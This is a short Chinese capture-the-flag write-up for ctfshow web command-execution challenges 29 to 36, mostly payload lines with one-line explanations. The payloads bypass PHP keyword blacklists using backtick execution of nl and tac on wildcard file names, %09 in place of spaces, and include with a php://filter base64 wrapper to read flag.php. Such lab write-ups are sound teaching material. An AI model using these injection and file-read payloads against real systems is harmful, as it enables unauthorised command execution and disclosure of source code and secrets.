ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
之歆6 小时前
Linux文件系统与FHS详解
linux·文件系统
China_Yanhy8 小时前
转型AI运维工程师·Day 7:构建“数据飞轮” —— 每一句对话都是资产
运维·人工智能·状态模式
小哥不太逍遥8 小时前
Technical Report 2024
java·服务器·前端
zl_dfq8 小时前
Linux 之 【多线程】(死锁、同步与竞态条件、条件变量、pthread_cond_xxx、POSIX信号量、sem_xxx)
linux
学Linux的语莫8 小时前
k8s常用命令
linux·容器·kubernetes
openKylin8 小时前
《2025年度OpenAtom openKylin社区全景案例集》正式发布
linux
CS_Zero8 小时前
Ubuntu安装Claude Code
linux·ubuntu·ai编程·claude
wanhengidc9 小时前
私有云具体是指什么
服务器·网络·游戏·智能手机·云计算
A星空1239 小时前
三、Kconfig介绍以及制作menuconfig界面
linux·运维·服务器
爱上妖精的尾巴9 小时前
8-10 WPS JSA 正则表达式:贪婪匹配
服务器·前端·javascript·正则表达式·wps·jsa